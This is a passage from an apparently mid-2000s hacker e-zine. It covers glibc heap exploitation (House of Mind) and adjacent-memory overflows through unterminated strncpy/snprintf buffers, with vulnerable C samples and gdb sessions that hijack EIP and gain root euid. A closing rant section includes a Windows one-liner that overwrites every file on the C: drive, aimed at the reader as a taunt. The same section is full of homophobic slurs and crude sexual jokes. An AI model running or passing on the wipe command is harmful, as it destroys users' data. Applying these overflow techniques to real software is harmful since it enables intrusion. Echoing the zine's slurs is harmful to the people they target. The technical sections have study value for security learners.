kspecial@mirage:~$ ./ploit > file kspecial@mirage:~$ su root Password: mirage:/home/kspecial# chown root heap mirage:/home/kspecial# chmod 4755 heap mirage:/home/kspecial# exit exit kspecial@mirage:~$ ./heap < file ptr found at 0x804a008 good heap allignment found on malloc() 724 (0x81002a0) uid=1000(kspecial) gid=1000(kspecial) euid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev), 107(powerdev),1000(kspecial) kspecial@mirage:~$ -------------------------------------------------------------------------------- diagram of the trashed heap: chunk 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x1 | prev_size (?) | size (0x409) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | garbage (0x4141414141414141) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | mutex (0x0) | max_size (0x102) x 8 . .-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . (Spam of write to location - 12) x 246 . . (0x08049670) . . | chunk 2 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x271 | prev_size (0x41414141) | size (0x409) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . 0x41 x 1024 . . . . | chunk 273 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x1 | prev_size (0x41414141) | size (0x409) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | . . Spam of arena location x 256 . . (0x0804a010) . . | chunk 274 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ x1 | prev_size (EB0c9090) | size (0x40d) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | garbage (0x9090909090909090) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + . . SHELLCODE! . . . . | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ chunk 2 actually has a prev_size of 0x08049670, because I overflow it in chunk 1 (but it is irrelevant). All the chunks from there on have a prev_size of "AAAA", while 273's is the jmp code. I will not be providing source code here for the fastbin method Phantasmal suggested to be used with the house of mind. I will, although, quickly document its primary goal and state why I feel about it the way I do. The fastbin method is not entirely different from the bin method described above. With the fastbin method, the primary goal is to point the arena elsewhere while making sure the size field of the chunk being free()'d is less than max_size, which will, in turn, cause this code to be excuted: set_fastchunks(av); fb = &(av->fastbins[fastbin_index(size)]); // ... p->fd = *fb; *fb = p; This is quite trivial to exploit with what has been said. If I where to point the arena to a location such that max_fast (av + 4) was larger than the chunk being free()'d and hence, &(av->fastbins[fastbin_index(size)]); returning a pointer to a GOT or .dtors entry, then that entry would be overwritten with the address of the chunk being free()'d. The only problem lies within av->system_mem, which is contained at the end of an arena structure (check malloc.c struct malloc_state for an arena structure). nextchunk (the chunk after the chunk being freed()'d) must be smaller than system_mem. In the small, vulnerable heap I coded, there where too many zeros after both the GOT and dtors sections. It was impossible to set system_mem to any value other than 0. Phantasmal wrote that if the GOT was too small (as in small programs, such as mine), the stack could be used to the same advantage. In other words, I would be capable of placing the arena in a spot of the stack such that *fb = p would overwrite eip or some other data flow variable. This is albeit near impossible on modern linux systems since address space layout randomization is present. However, this method is viable in larger applications, and is deffinitely easier to write. One last note. This work was done with a modern Debian 4.0 machine. The GLibC version is 2.3.6, the following debian packages where used: libc6-dbg - GNU C Library: Libraries with debugging symbols libc6-dev - GNU C Library: Development Libraries and Header Files Along with standard 2.3.6 sourecode. --K-sPecial [===================================[ REF ]====================================] PS: I will place these codes on the site, in case 80 CPL formatting has gotten the best of them. [1] "The Malloc Maleficarum" (http://securityfocus.com) By Phantasmal Phantasmagoria. Tue, 11 Oct 2005 10:14:02 -0700 Sat, 31 Dec 2006 23:01:33 -0500 http://awarenetwork.org/etc/zine1/ref/MallocMaleficarum.txt [2] "Once upon a free()" (http://phrack.org) Published time Unknown Sat, 31 Dec 2006 23:01:33 -0500 http://awarenetwork.org/etc/zine1/ref/once%20upon%20a%20free.txt [3] "GLibC" http://gnu.org Tue, 03 Nov 2005 20:12 31 Dec 2006 23:01:33 -0500 20:12 http://ftp.gnu.org/gnu/glibc/glibc-2.3.6.tar.bz2 [==============================================================================] [------------------[ Advances in adjacent memory overflows ]-------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/ _`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### by Nomenumbra/[0x00SEC] ################ *############* "T######T" --[ 0x00 ]--------------------------------------------------[ Introduction ]---- In this relatively small paper we'll discuss the basics and some (completely new) advances in adjacent memory overflows. For those unfamiliar with Adjacent memory overflows i'd like to refer you to Mercy's article (http://www.milw0rm.com/papers/98) or Twitch's article "TAKING ADVANTAGE OF NON-TERMINATED ADJACENT MEMORY SPACES" in phrack (Volume 0x0A, Issue 0x38 phile 0x0E). Here follows a basic explanation of the phenomenon: In most of today's apps the vulnerable strcpy() and strcat() functions have been replaced with strncpy() and strncat() to prevent normal buffer overflows. It is however possible to exploit the strn* functions and the likes trough 0-unterminated strings. Let's look at the following example: -------------------------------------------------------------------------------- nobody@cerebrum:~/# cat vln.c #include int main(int argc,char* argv[]) { char buf3[512]; char buf2[1024]; char buf[256]; strncpy(buf,argv[1],256); strncpy(buf2,argv[2],1024); sprintf(buf3,"%s",buf); return 0; } -------------------------------------------------------------------------------- Well most people will say, this shouldn't be a problem? Now should it? I mean, buf will never be over 256 bytes, and buf3 is far bigger then buf so where's the problem? The problem lies in the combination of strncpy and sprintf. Strncpy will namely copy up to a maximum of 256 bytes, so if argv[1] contains exactly or more then 256 bytes, it won't copy the terminating NULL-byte (and neither add it), then sprintf will copy bytes from buf's address all the way up to the first encountered NULL-byte terminator. As you can see, buf's stack data will flow right into buf2's data, since they're allocated right next to each other on the stack. So we can supply a total of 1024 + 256 = 1280 bytes which is more then enough to overflow buf3. As you can see the requirements for exploiting an app with an adjacent memory overflow are: [*] Prescense of a vulnerable function handling user-controlled data [*] This data being handled by a function assuming NULL-byte termination [*] Fair control of surrounding stack area These vulnerable functions can be custom as well of course, so don't only look for the ones mentioned here. --[ 0x01 ]-----------------------------------------[ Exploiting snprintf() ]---- Of course, not all functions will allow adjacent memory overflows to occur like this. For example, read() and strncpy() will allow further reading, while similarly fgets() and snprintf() will not, under the same size limitations. snprintf() (and fgets) where long thought to be safe from adjacent memory overflows due to automatic adding of a terminating null byte - that was wrong as I noticed ... The official documentation tells us that: "If size is zero, nothing is written and str may be null." Nothing is written, correct, but it isn't 0 terminated either >:). Now let us look a bit more in-depth: Size includes the terminating 0byte ,so if size is 10, it'll copy bytes until it encouters a terminating 0 byte, if it doesn't find one withing 9 bytes, it'll copy 9 bytes and add it's own terminating 0 byte. And this is where the problem lies.... It copies up to size-1 bytes from the buffer - interesting. Now if we look at the doprintf() function utilized by snprintf() source we see: -------------------------------------------------------------------------------- currlen = flags = cflags = min = 0; max = -1; ch = *format++; while (state != DP_S_DONE) { if ((ch == '\0') || (currlen >= maxlen)) state = DP_S_DONE; // .... // Then later, at the end: if (currlen < maxlen - 1) buffer[currlen] = '\0'; else buffer[maxlen - 1] = '\0'; -------------------------------------------------------------------------------- the problem obviously lies in the fact that currlen being 0 and getting compared to 0 it breaks (the switch statement over state breaks upon DP_S_DONE) and goes straight to if(0 < -1) buffer[0] = '\0'; else buffer[0 - 1] = '\0'; so buffer[-1] will be 0x00? yup, which effectively leaves the buffer unterminated with a NULL byte (and unfilled too) leaving it completely open to adjacent memory overflows. want an example? -------------------------------------------------------------------------------- nobody@cerebrum:~/# cat /proc/sys/kernel/randomize_va_space 0 nobody@cerebrum:~/# cat vln.c #include nobody@cerebrum:~/# gdb vln GNU gdb 6.3 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) r a `perl -e 'print "A"x12,"B"x4'` Starting program: /tmp/vln a `perl -e 'print "A"x12,"B"x4'` ???%?AAAAAAAAAAAABBBB Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) -------------------------------------------------------------------------------- Now, on with the show. This type of bug will most likely only occur when size is user-supplied or user-influenced, so imagine the following example: -------------------------------------------------------------------------------- nobody@cerebrum:~/# cat vln.c #include int main(int argc,char* argv[]) { char buf3[20]; char buf2[100]; char buf[10]; int lim; printf("Usage: %s " " \n",argv[0]); lim = atoi(argv[1]); if (lim > 9) exit(0); snprintf(buf,lim,"%s",argv[2]); snprintf(buf2,99,"%s",argv[3]); // correct usage sprintf(buf3,"%s",buf); // buf to buf3 printf("buf3: [%s]\n",buf3); return 0; } nobody@cerebrum:~/# gcc -o vln vln.c nobody@cerebrum:~/# ./vln 2 123456789 test Usage: ./vln buf3: [1] nobody@cerebrum:~/# ./vln 0 123456789 test ./vln 0 123456789 test Usage: ./vln buf3: [?? nobody@cerebrum:~/# ./vln -1 123456789123456789 test Usage: ./vln buf3: [1234567890123456test] -------------------------------------------------------------------------------- As you can see the buffer will be filled up with 16 bytes before continuing into buf2. Exploitation is, again, trivial: -------------------------------------------------------------------------------- nobody@cerebrum:~/# gdb vln GNU gdb 6.3 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) r -1 1234567890123456 `perl -e 'print "A"x28,"B"x4'` Starting program: /tmp/vln -1 1234567890123456 `perl -e 'print "A"x28,"B"x4'` Usage: /tmp/vln buf3: [1234567890123456AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB] Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) -------------------------------------------------------------------------------- As you can see, the exploitability of a piece of code is highly situationally and environmentally dependant, but this shows that some cases CAN be exploited and arms you with yet another nice weapon in your arsenal of doom ;) --[ 0x02 ]----------------------[ Abusing strlen() for more memory madness ]---- Yes, strlen() and consorts can be exploited too, well not in a casual way like buffer overflows, but in the same way integer overflows can. Through programmer assumption. The programmer assumes things about the return value of strlen(). For example, if we strlen(buf) and buf is the result of a strncpy(buf,argv[1],10) the programmer will most likely assume strlen() will never be bigger than 10. But that's untrue... Let us look at a sample program that would be commonly considered safe, if it weren't for adjacent memory overflows: -------------------------------------------------------------------------------- nobody@cerebrum:~/# cat vln.c #include int main(int argc,char* argv[]) { char buf3[512]; char buf2[1024]; char buf[256]; strncpy(buf,argv[1],256); strncpy(buf2,argv[2],1024); strncpy(buf3,buf,strlen(buf)); printf("[%s]\n",buf3); return 0; } -------------------------------------------------------------------------------- Hmm how to exploit this? We have a 0-unterminated buf going all the way right into buf2 - but buf is strncpy()'ed into buf3, not sprintf()'ed or strcpy()'ed - and as we take a close look at the size parameter, we spot strlen(). Now how can this work in our benefit: strlen() counts the number of bytes at the pointer supplied to it's first argument, all the way up to the first terminating null byte. Because buf is 0-unterminated in the example, strlen will continue searching for a null-byte in buf2, hence it returning a higher result. This can be exploited in a trivial manner: -------------------------------------------------------------------------------- nobody@cerebrum:~/# gdb vln GNU gdb 6.3 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) r `perl -e 'print "A"x256'` `perl -e 'print "A"x268,"B"x4'` Starting program: /tmp/vln `perl -e 'print "A"x256'` `perl -e 'print "A"x26 8,"B"x4'` [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BBBB] Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? () (gdb) -------------------------------------------------------------------------------- This vulnerability goes for memcpy, strncat, memmove and others as well of course. Note that strstr, strchr,strcspn and the like are vulnerable too, if the first parameter is 0-unterminated, they will keep digging trough memory, potentially returning pointers to some place in a far bigger buffer or one containing potentially sensitive data). As you can see this case is yet again higly dependant on the code as a whole, just like with integer overflows. To sum up some vulnerable functions: Some functions vuln to adjacent memory overflows trough 0-unterminated strings: [*] sprintf [*] fprintf [*] snprintf [*] memcpy [*] memmove [*] strcpy [*] strcat [*] strlen [*] strstr [*] strchr [*] strcspn [*] read [*] ... --[ 0x03 ]---------------------------------------------------------[ Outro ]---- Well peeps, i hope you enjoyed this small text and learned something from it, i most certainly did. And remember kids, keep the scene alive, never sell out and never narc. Greetz and shouts to: The .aware/xzziroz cast & crew (of course ;), All Nullsec members, the HackThisSite community, PullThePlug folks, the guys over at SmashTheStack, RRLF, Binary Shadow Organization, Blacksecurity, the vx.netlux.org people and all true "hackers"/blackhats out there. [==============================================================================] [-------------------------------[ /dev/random ]--------------------------------] [==============================================================================] ..ssS$S$$S:sss:.. .$SSS$$$$$SS$SsS$$S. .sS$$$SSSSS$$$(|`$S$$Ss. .sSSS$$$' `:$SS$$'` `/'; :S$$$$S' `:$$S._ :S$SSS$:. `'?::.. `S$SS$S$$$Sssssss:?. `SS$SSSS$$$$$S$$$$$$s. `S$$$$$$$SS$$S$SS$$$S:. `?S$$$S$$$$$S$$SSS$$$. The rattler's private thoughts `~~~~~?:S$$$$SSSSS: on the world, the internet, `;SSSSSSSS; and many other things. .SSSS$$$$S' o .S$$Ss. .s$$$$$SS$$' o' ..:$S$$SS$$SsssS$$SSSSS$SS' ::.;:S'~~?:$SSS$$$$SSSS$SSS$$' ''' `$$$S$$[rattle]$' [========================================================================] Pages that have a link to google search, like this: ___________________________ _______________ | | | search google | """"""""""""""""""""""""""" """"""""""""""" ... are fucking gay. if you need a spacefiller, use a random packetstorm ad. If we wanted to search google, we would go to w w w - g o o g l e - c o m [========================================================================] ASCII roses are so fucking gay. @-,--`-- :-) wtf 8===========D ? [========================================================================] Zone-H is really gay http://www.zone-h.org/ [========================================================================] //////// \ .) .)/ \ _' / \ | "hi!" | |\ ,,,,, | |\\ (^.(^) ( // \O / | || /| | | || // \ \___ | || ## ###\ \ //////// \ -) -)/ \ o / \ | *MMPF* | |\ ,,,,, | |\\ (+.(+) ( 8======) / | | \ /| | | |\ \ // \ \____ | |/ / ## ####\ \ [========================================================================] Windows 2003 stack protection is pretty gay __________________________________________________ | Overflow Detected | _ | # | X | |""""""""""""""""""""""""""""""""""""""""""""""""""| | uh err sumthing wrong with eip here's some | | numbers: | | | | D4Ef566D 00400000 00000000 00000001 0D00D034 | | | | _____________ | | | Ok | | | `````````````` | """""""""""""""""""""""""""""""""""""""""""""""""""" [========================================================================] for /R c:\ %i in (*.*) do @echo M>%~fsi 2>NUL ... yourself. [========================================================================] MSN emoticons are so fucking gay. [15:28] rattle: it's (cos(t), sin(t), 0) [15:28] stev: I see a red telephone [========================================================================] People with excessively long MSN nicknames should die. [16:42] charles - hey bob, I really enjoyed shifting that dildo up your anus last night - listening to Metallica - YEAH!: hey [16:42] rattle: change your nick, for the love of god. [========================================================================] class porn { explicit sex(long penis, double penetration); }; [========================================================================] _______________________________________ | Enter Target IP | _ | # | X | |"""""""""""""""""""""""""""""""""""""""| | Enter each digit separately. To | | switch from one ocet field to the | | next, use CTRL+BLANK. In order | | to switch from one digit field to | | the next, use CTRL+ALT+BLANK. | | _ _ _ _ _ _ _ _ _ _ _ _ | | IP: | | | |.| | | |.| | | |.| | | | | | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ | | ________ ________ | | | CANCEL | | OK | | | """""""" """""""" | """"""""""""""""""""""""""""""""""""""" IP Address Input Controls drive me insane. [========================================================================] # define b00l bool # define d4mn catch # define c1455 class # define d31337 delete # define expl1c17 explicit # define n0p3z false # define m473 friend # define inl1n3 inline # define m3w74b13 mutable # define n3w new # define pr1v473 private # define pr073c73d protected # define pub1ic public # define t3mp1473 template # define th1z this # define thr0w throw # define trud47 true # define m3bb3h try # define typ3n4m3 typename # define u51ng using # define v1r7u41 virtual And even then, C++ would not be l33t. [========================================================================] _..gggggppppp.._ _.go2DD54CA5F04E6EE60Aop._ .g4CBD616BE88DF93F761A90FA0393p. .g9A1C6A235A1DC2208D42AB86940C9A954Ep. .oDA77550E3A55D3F079F0B6E6959916DE95CAE3o. .o52950F71920F908B563D6A79DDD4A375DA5978CE25o. o7EC76BC428D48FC156D98C79077EFCE5DA156F4552C40Bo o4A55E5C22696814ECA2332797A7B5B088A9DD82D09D1A0A3o oEE3BBD799DEDE79EAF3B2BFC71CEA704AD412B8FD612A3B29Bo o9D7675F188662EEAD5FA677A6C2F934DE3194460F0E51B57857Co o317227593982925589EF8B5D496D3C0039B7D9200DD44DB26AA8CBo :F0D819CD076F1229B151A00CC514BB9349452681389C6A710C78E791; 43894E690A8FCD6BFFC2325602BE5B9A1E3529EDC610C780878DD79C63 :A52BCB8D42BFFDC72DE221729F0A5A221A01EEEAFDCC83C90165E195B0; C7FA692DAAA1D35EE0AFEA42CC318E55F8CFD72D51B27FBCC8BA9C9B7EB0 :4C9305261B2265F5E69EA44DE49FD840B713E5D94B8DBD52E46033CFE50B; :A249372A3F396FA0FD5B6432B796C57E3DC5B3275607BA92D82E1E839482; C63AB12D97C8445D031BF57246E5616FAC1E713B7B58EF193C15C2A4598ABC 379BD8E3C0133B394F83D67F5B20FD797AD4CADA1EB9621A9F517E0D6925F7 :D1D54FCB21589171B2DBE1D8E87936ABAP"' "QCE3AD9D4CAA0A74B33; :B832EACD8E987E0F18365F974D98F7FF1Y Y04CCB95C9904CC617; 77CF38BC802B1B933E79C99432F185103 EC58A3DB7240EC742 :039AD9304D24EA8E5C13B76E6C7F71CA. .624F0879C4820007; F383A4082BDB1378F30D6E5797FD9559O O050224388E474486 :D05F6D6317D05EFAB48C9C9F77D884C2o,_ _,oDD5FF0DDD9238647; T29CFE61A0A56AF9929295E12C5E82B2FB3CF5F811B4D8C5E35E210P T3B04FAE89130E3915652630B8B84EFEB7BBAB4142EB46C90922EP T02EF86A5DF116B42275CD09135EBA92A51662C9F719C944ABAP TA8137CFF503939AEB079D9566230965C652A2ACEAC29D347P TD45EB4066AC89F3EF5B7E148C295C575ECF62E8E080119P `TF0FDC2A352208F32F3EB2B6F1C94A5F220EC9AE9D0P' `TD5E77B45C728B6AD5549DA225C3A855CAE9ACCP' "^DE7171378BED7E10E5DEB5A0A8377593FF^" "^T8314220058FB8B21831A734F04P^" '""^^^T72B267EFA7T^^^""' I make that shit work. No one rules the clit like me. I AM THE CLIT COMMANDER. mov al,3 ; .aware cr3w restores video m0de - - = ==== = === =] int 10h ; - = = = = ==== ======= === ======= = ======== =] [==============================================================================]